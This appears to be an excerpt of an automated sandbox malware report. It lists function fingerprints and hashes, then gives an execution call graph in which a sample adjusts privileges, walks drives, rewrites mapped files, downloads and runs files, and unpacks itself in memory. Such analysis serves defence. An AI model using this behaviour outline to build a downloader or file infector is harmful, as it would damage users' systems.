                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: BrushCreateH_prologSolid
                                    • String ID: |TL
                                    • API String ID: 707096553-51895757
                                    • Opcode ID: 5a51cc3ed4760d7992fefff226f83e1df4be42017c50c74e3c7dd61128e24846
                                    • Instruction ID: 309183ce4caea2d7179d4c439a831c08c1ad6c02418adb534babc6a706566a27
                                    • Opcode Fuzzy Hash: 5a51cc3ed4760d7992fefff226f83e1df4be42017c50c74e3c7dd61128e24846
                                    • Instruction Fuzzy Hash: A5E09276A001119BCB54EF89D901BAEB6E4EF0971AF10806FF40692601DBB88A008B98
                                    Function 004C3056 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004C305B
                                    • EndPaint.USER32(?,?,?,?,004175C3), ref: 004C3078
                                      • Part of subcall function 004C2662: __EH_prolog.LIBCMT ref: 004C2667
                                      • Part of subcall function 004C2662: DeleteDC.GDI32(00000000), ref: 004C2686
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prolog$DeletePaint
                                    • String ID: PTL
                                    • API String ID: 2732140596-843080265
                                    • Opcode ID: 5f1b495bd14b53e87a8ae952ba601fe77c86cde4fe47d48c27110a96546b245d
                                    • Instruction ID: 298eb23f1312ab7693943876685adbd02205d25d67bcd27f7ffda802fdd376fb
                                    • Opcode Fuzzy Hash: 5f1b495bd14b53e87a8ae952ba601fe77c86cde4fe47d48c27110a96546b245d
                                    • Instruction Fuzzy Hash: 2DE09B75910614DBD714AF54C505B9DB7B4FF04714F00471EF052A3591CBF45A048795
                                    Function 00415450 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004BADB1
                                      • Part of subcall function 004BE544: __EH_prolog.LIBCMT ref: 004BE549
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: ~dL$~dL
                                    • API String ID: 3519838083-546918951
                                    • Opcode ID: cffb9e840424c63b7d1d4738864e538f4c3f746c77d676abb0f927140ff98aa2
                                    • Instruction ID: c17e9b686ffd1b9162cacc362f1725c094527f4dc1768dbef585efd7aee97533
                                    • Opcode Fuzzy Hash: cffb9e840424c63b7d1d4738864e538f4c3f746c77d676abb0f927140ff98aa2
                                    • Instruction Fuzzy Hash: 2DE08671911664EBCB15EF99C4063DCBBF4EF85729F10425FE02263681C7B80A018BA9
                                    Function 004C2662 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: DeleteH_prolog
                                    • String ID: >TL
                                    • API String ID: 3406903920-1879671907
                                    • Opcode ID: 9afc4224247f28696fce9845b136a946a69cf592586bfc32dcc57bd4714d2bb4
                                    • Instruction ID: fded815625b265bb732821cde76c4a85378b799e1faeb0fcda2b62eb370cc2f6
                                    • Opcode Fuzzy Hash: 9afc4224247f28696fce9845b136a946a69cf592586bfc32dcc57bd4714d2bb4
                                    • Instruction Fuzzy Hash: 1EE012B4D01204DBCB459FA5D604B5DBBB0FB0530DF10846EE40663752C7BD8501CA6C
                                    Function 00433BB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: wsprintf
                                    • String ID:
                                    • API String ID: 2111968516-0
                                    • Opcode ID: 5433175e1be277195485b1c9d971552ce9ba47b55ba87389da034c8af8698540
                                    • Instruction ID: a6b1acd503c6c62abdab22268181d54ddd1336cfdc505f0f35d34971045040a2
                                    • Opcode Fuzzy Hash: 5433175e1be277195485b1c9d971552ce9ba47b55ba87389da034c8af8698540
                                    • Instruction Fuzzy Hash: 5831B7B55043005BC304DF64DC45DABBBD8EFC9758F040A2DF94693281EB79EE08C6A6
                                    Function 004C6E5D Relevance: 5.1, APIs: 4, Instructions: 61stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,?,?,?,00411B4C,?,?), ref: 004C6E73
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,?,00411B4C,?,?), ref: 004C6E9A
                                    • lstrlen.KERNEL32(?,?,?,?,00411B4C,?,?), ref: 004C6EB5
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,?,00411B4C,?,?), ref: 004C6EDC
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWidelstrlen
                                    • String ID:
                                    • API String ID: 3109718747-0
                                    • Opcode ID: 4c7af76a83e66cde83a76876f5b713da53b32172024a0345ce9e4012b0d200d5
                                    • Instruction ID: be29f5c996b7b21d4b04c35b2a29eb188c2bf6bd21b6f635e7a8ec6e970845c6
                                    • Opcode Fuzzy Hash: 4c7af76a83e66cde83a76876f5b713da53b32172024a0345ce9e4012b0d200d5
                                    • Instruction Fuzzy Hash: F011213B804205BBCB911BA1DC09F9BBF68EF82760F218136F819861A0E734D51187A9

                                    Execution Graph

                                    Execution Coverage:28.7%
                                    Dynamic/Decrypted Code Coverage:10.4%
                                    Signature Coverage:4.4%
                                    Total number of Nodes:297
                                    Total number of Limit Nodes:11
                                    execution_graph 1015 b314e1 1016 b31541 1015->1016 1017 b314fd GetModuleHandleA 1015->1017 1020 b31573 1016->1020 1021 b31549 1016->1021 1018 b31512 1017->1018 1019 b3151a VirtualQuery 1017->1019 1018->1016 1019->1018 1026 b31638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1020->1026 1023 b31566 1021->1023 1043 b31af9 1021->1043 1024 b31579 ExitProcess 1027 b3167a 1026->1027 1028 b3167f 1026->1028 1061 b3139f GetVersionExA 1027->1061 1049 b31718 GetSystemTimeAsFileTime 1028->1049 1031 b31686 1032 b316ca 1031->1032 1035 b316a0 CreateThread 1031->1035 1033 b316d0 1032->1033 1034 b316d7 1032->1034 1082 b31581 1033->1082 1037 b3170f 1034->1037 1038 b316dd lstrcpy 1034->1038 1054 b32c48 memset 1035->1054 1298 b31099 1035->1298 1037->1024 1038->1024 1042 b31718 3 API calls 1042->1032 1044 b31b11 1043->1044 1045 b31b09 1043->1045 1047 b31b16 CreateThread 1044->1047 1048 b31b0f 1044->1048 1046 b31638 188 API calls 1045->1046 1046->1048 1047->1048 1317 b31638 189 API calls 1047->1317 1048->1023 1048->1048 1050 b31735 SHSetValueA 1049->1050 1051 b31754 1049->1051 1053 b31786 __aulldiv 1050->1053 1052 b3175a SHGetValueA 1051->1052 1051->1053 1052->1053 1053->1031 1088 b31973 PathFileExistsA 1054->1088 1057 b32cb2 1059 b32cbb VirtualFree 1057->1059 1060 b316ba WaitForSingleObject 1057->1060 1058 b32c8f CreateThread WaitForMultipleObjects 1058->1057 1110 b32b8c memset GetLogicalDriveStringsA 1058->1110 1059->1060 1060->1042 1062 b314da 1061->1062 1063 b313cf LookupPrivilegeValueA 1061->1063 1062->1028 1064 b313ef 1063->1064 1065 b313e7 1063->1065 1064->1062 1283 b3120e GetModuleHandleA GetProcAddress 1064->1283 1278 b3119f GetCurrentProcess OpenProcessToken 1065->1278 1071 b31448 GetCurrentProcessId 1071->1062 1072 b31457 1071->1072 1072->1062 1073 b31319 3 API calls 1072->1073 1074 b3147f 1073->1074 1075 b31319 3 API calls 1074->1075 1076 b3148e 1075->1076 1076->1062 1077 b31319 3 API calls 1076->1077 1078 b314b4 1077->1078 1079 b31319 3 API calls 1078->1079 1080 b314c3 1079->1080 1081 b31319 3 API calls 1080->1081 1081->1062 1297 b3185b GetSystemTimeAsFileTime srand rand srand rand 1082->1297 1084 b31592 wsprintfA wsprintfA lstrlen CreateFileA 1085 b31633 1084->1085 1086 b315fb WriteFile CloseHandle 1084->1086 1085->1037 1086->1085 1087 b3161d ShellExecuteA 1086->1087 1087->1085 1089 b319a0 1088->1089 1090 b31ac7 1088->1090 1091 b319af CreateFileA 1089->1091 1090->1057 1090->1058 1092 b319c4 Sleep 1091->1092 1093 b31a28 GetFileSize 1091->1093 1092->1091 1094 b319d5 1092->1094 1095 b31a80 1093->1095 1096 b31a38 1093->1096 1109 b3185b GetSystemTimeAsFileTime srand rand srand rand 1094->1109 1097 b31a96 1095->1097 1098 b31a8d FindCloseChangeNotification 1095->1098 1096->1095 1100 b31a3d VirtualAlloc 1096->1100 1101 b31aad 1097->1101 1102 b31a9c DeleteFileA 1097->1102 1098->1097 1100->1095 1108 b31a53 1100->1108 1101->1090 1107 b31ab8 VirtualFree 1101->1107 1102->1101 1103 b319da wsprintfA CopyFileA 1103->1093 1105 b31a0d CreateFileA 1103->1105 1105->1093 1105->1102 1106 b31a59 ReadFile 1106->1095 1106->1108 1107->1090 1108->1095 1108->1106 1109->1103 1111 b32c09 WaitForMultipleObjects 1110->1111 1116 b32bc8 1110->1116 1113 b32c2a CreateThread 1111->1113 1114 b32c3c 1111->1114 1112 b32bfa lstrlen 1112->1111 1112->1116 1113->1114 1121 b32845 1113->1121 1115 b32bd2 GetDriveTypeA 1115->1112 1115->1116 1116->1112 1116->1115 1117 b32be3 CreateThread 1116->1117 1117->1112 1118 b32b7d 1117->1118 1131 b329e2 memset wsprintfA 1118->1131 1268 b3274a memset memset SHGetSpecialFolderPathA wsprintfA 1121->1268 1123 b32878 DeleteFileA 1124 b3289a 1123->1124 1125 b3288c VirtualFree 1123->1125 1128 b328a4 CloseHandle 1124->1128 1129 b328ab 1124->1129 1125->1124 1126 b32853 1126->1123 1127 b32692 8 API calls 1126->1127 1130 b3239d 186 API calls 1126->1130 1127->1126 1128->1129 1130->1126 1132 b32a3a memset lstrlen lstrcpyn strrchr 1131->1132 1133 b32abc memset memset FindFirstFileA 1131->1133 1132->1133 1134 b32a88 1132->1134 1145 b328b8 memset wsprintfA 1133->1145 1134->1133 1136 b32a9a lstrcmpiA 1134->1136 1138 b32b74 1136->1138 1139 b32aad lstrlen 1136->1139 1139->1133 1139->1136 1140 b32b61 FindNextFileA 1141 b32b23 1140->1141 1142 b32b6d FindClose 1140->1142 1143 b32b35 lstrcmpiA 1141->1143 1144 b328b8 174 API calls 1141->1144 1142->1138 1143->1141 1143->1142 1144->1140 1146 b32905 1145->1146 1151 b32951 memset 1145->1151 1147 b32956 strrchr 1146->1147 1148 b3291b memset wsprintfA 1146->1148 1146->1151 1150 b32967 lstrcmpiA 1147->1150 1147->1151 1149 b329e2 180 API calls 1148->1149 1149->1151 1152 b3297a 1150->1152 1153 b32988 lstrcmpiA 1150->1153 1151->1140 1163 b31e6e 1152->1163 1153->1151 1154 b32994 1153->1154 1156 b329ad strstr 1154->1156 1157 b329a5 lstrcpy 1154->1157 1158 b329d3 1156->1158 1159 b329cb 1156->1159 1157->1156 1228 b32692 1158->1228 1206 b3239d strstr 1159->1206 1164 b31e7d 1163->1164 1237 b31df6 strrchr 1164->1237 1167 b32332 1171 b32346 1167->1171 1172 b3233d UnmapViewOfFile 1167->1172 1168 b31eb0 SetFileAttributesA CreateFileA 1168->1167 1169 b31edf 1168->1169 1242 b31915 1169->1242 1174 b32350 1171->1174 1175 b3234b FindCloseChangeNotification 1171->1175 1172->1171 1176 b32391 1174->1176 1177 b32356 CloseHandle 1174->1177 1175->1174 1176->1151 1177->1176 1178 b31f2e 1178->1167 1248 b31c81 1178->1248 1182 b31f92 1183 b31c81 2 API calls 1182->1183 1184 b31f9f 1183->1184 1184->1167 1185 b31af9 169 API calls 1184->1185 1187 b32024 1184->1187 1190 b31fc0 1185->1190 1186 b31af9 169 API calls 1188 b3207a 1186->1188 1187->1167 1187->1186 1189 b31af9 169 API calls 1188->1189 1194 b32090 1189->1194 1190->1167 1190->1187 1191 b31af9 169 API calls 1190->1191 1192 b31ffe 1191->1192 1193 b32013 FlushViewOfFile 1192->1193 1193->1187 1195 b320bb memset memset 1194->1195 1196 b320f5 1195->1196 1197 b31c81 2 API calls 1196->1197 1198 b321de 1197->1198 1199 b32226 memcpy UnmapViewOfFile FindCloseChangeNotification 1198->1199 1253 b31b8a 1199->1253 1201 b3226e 1261 b3185b GetSystemTimeAsFileTime srand rand srand rand 1201->1261 1203 b322ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1204 b31915 3 API calls 1203->1204 1205 b3231f CloseHandle 1204->1205 1205->1167 1207 b32451 CreateFileA GetFileSize 1206->1207 1213 b323d8 1206->1213 1208 b32480 1207->1208 1209 b32675 CloseHandle 1207->1209 1208->1209 1211 b32499 1208->1211 1210 b3267c RemoveDirectoryA 1209->1210 1212 b32687 1210->1212 1214 b31915 3 API calls 1211->1214 1212->1151 1213->1207 1213->1212 1215 b324a4 9 API calls 1214->1215 1263 b3189d memset CreateProcessA 1215->1263 1218 b3255c Sleep memset wsprintfA 1219 b329e2 163 API calls 1218->1219 1220 b32597 memset wsprintfA Sleep 1219->1220 1221 b3189d 6 API calls 1220->1221 1222 b325e4 Sleep CreateFileA 1221->1222 1223 b31915 3 API calls 1222->1223 1224 b32610 CloseHandle 1223->1224 1224->1210 1225 b3261e 1224->1225 1225->1210 1226 b32641 SetFilePointer WriteFile 1225->1226 1226->1210 1227 b32667 SetEndOfFile 1226->1227 1227->1210 1229 b326b2 WaitForSingleObject 1228->1229 1230 b326a2 CreateEventA 1228->1230 1231 b326c1 lstrlen ??2@YAPAXI 1229->1231 1232 b32708 1229->1232 1230->1229 1233 b32736 SetEvent 1231->1233 1234 b326da lstrcpy 1231->1234 1232->1233 1235 b32718 lstrcpy ??3@YAXPAX 1232->1235 1233->1151 1236 b326f1 1234->1236 1235->1236 1236->1233 1238 b31e13 lstrcpy strrchr 1237->1238 1241 b31e62 1237->1241 1239 b31e40 lstrcmpiA 1238->1239 1238->1241 1240 b31e52 lstrlen 1239->1240 1239->1241 1240->1239 1240->1241 1241->1167 1241->1168 1243 b31924 SetFilePointer CreateFileMappingA MapViewOfFile 1242->1243 1244 b31928 1242->1244 1243->1167 1243->1178 1245 b3194f 1244->1245 1246 b3192e memset GetFileTime 1244->1246 1245->1243 1247 b31954 SetFileTime 1245->1247 1246->1243 1247->1243 1249 b31c9c 1248->1249 1251 b31c94 1248->1251 1250 b31cae memset memset 1249->1250 1249->1251 1250->1251 1251->1167 1252 b3185b GetSystemTimeAsFileTime srand rand srand rand 1251->1252 1252->1182 1254 b31b93 1253->1254 1262 b3185b GetSystemTimeAsFileTime srand rand srand rand 1254->1262 1256 b31bca srand 1257 b31bd8 rand 1256->1257 1258 b31c08 1257->1258 1258->1257 1259 b31c29 memset memcpy lstrcat 1258->1259 1259->1201 1261->1203 1262->1256 1264 b318e0 CloseHandle WaitForSingleObject 1263->1264 1265 b3190c 1263->1265 1266 b31907 CloseHandle 1264->1266 1267 b318fb GetExitCodeProcess 1264->1267 1265->1210 1265->1218 1266->1265 1267->1266 1277 b3185b GetSystemTimeAsFileTime srand rand srand rand 1268->1277 1270 b327b5 wsprintfA CopyFileA 1271 b32840 1270->1271 1272 b327de wsprintfA 1270->1272 1271->1126 1273 b31973 17 API calls 1272->1273 1274 b3280f 1273->1274 1275 b32813 DeleteFileA 1274->1275 1276 b32820 CreateFileA 1274->1276 1275->1276 1276->1271 1277->1270 1279 b31200 CloseHandle 1278->1279 1280 b311c6 AdjustTokenPrivileges 1278->1280 1279->1064 1281 b311f7 CloseHandle 1280->1281 1282 b311f6 1280->1282 1281->1279 1282->1281 1284 b31310 1283->1284 1285 b3123f GetCurrentProcessId OpenProcess 1283->1285 1284->1062 1292 b31319 1284->1292 1285->1284 1289 b31262 1285->1289 1286 b312b0 VirtualAlloc 1286->1289 1291 b312b8 1286->1291 1287 b312f1 CloseHandle 1287->1284 1288 b31302 VirtualFree 1287->1288 1288->1284 1289->1286 1289->1287 1290 b31296 VirtualFree 1289->1290 1289->1291 1290->1286 1291->1287 1293 b3134a 1292->1293 1294 b3132a GetModuleHandleA GetProcAddress 1292->1294 1295 b31363 1293->1295 1296 b31351 memset 1293->1296 1294->1293 1294->1295 1295->1062 1295->1071 1296->1295 1297->1084 1299 b31196 1298->1299 1300 b310ba 1298->1300 1300->1299 1316 b3185b GetSystemTimeAsFileTime srand rand srand rand 1300->1316 1302 b31118 wsprintfA wsprintfA URLDownloadToFileA 1303 b31168 lstrlen Sleep 1302->1303 1304 b310dc 1302->1304 1303->1300 1307 b31000 CreateFileA 1304->1307 1308 b31092 WinExec lstrlen 1307->1308 1309 b31025 GetFileSize CreateFileMappingA MapViewOfFile 1307->1309 1308->1299 1308->1300 1310 b31057 1309->1310 1311 b3107b 1309->1311 1314 b31061 1310->1314 1315 b31074 UnmapViewOfFile 1310->1315 1312 b31087 CloseHandle 1311->1312 1313 b3108d CloseHandle 1311->1313 1312->1313 1313->1308 1314->1315 1315->1311 1316->1302 1332 b32361 1333 b32374 1332->1333 1334 b3236b UnmapViewOfFile 1332->1334 1335 b32382 1333->1335 1336 b32379 CloseHandle 1333->1336 1334->1333 1337 b32391 1335->1337 1338 b32388 CloseHandle 1335->1338 1336->1335 1338->1337 1318 b36076 1319 b3607b 1318->1319 1324 b360c7 1318->1324 1321 b360b0 VirtualAlloc 1319->1321 1322 b361b2 1319->1322 1319->1324 1320 b3615f VirtualFree 1320->1324 1321->1324 1326 b36389 VirtualProtect 1322->1326 1331 b362fb 1322->1331 1323 b36198 VirtualFree 1323->1322 1324->1320 1324->1323 1325 b360d5 VirtualAlloc 1324->1325 1325->1324 1329 b363b7 1326->1329 1327 b363fc VirtualProtect 1328 b36400 1327->1328 1329->1327 1330 b363e7 VirtualProtect 1329->1330 1330->1327 1330->1329 1339 b36014 1340 b3605f 1339->1340 1341 b36035 GetModuleHandleA 1339->1341 1342 b3604d GetProcAddress 1341->1342 1343 b36058 1342->1343 1343->1340 1343->1342 1343->1343 1344 b36158 VirtualFree 1352 b360c7 1344->1352 1345 b36198 VirtualFree 1354 b361b2 1345->1354 1346 b360d5 VirtualAlloc 1346->1352 1347 b36389 VirtualProtect 1351 b363b7 1347->1351 1348 b363fc VirtualProtect 1349 b36400 1348->1349 1350 b3615f VirtualFree 1350->1352 1351->1348 1353 b363e7 VirtualProtect 1351->1353 1352->1345 1352->1346 1352->1350 1353->1348 1353->1351 1354->1347 1355 b362fb 1354->1355

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
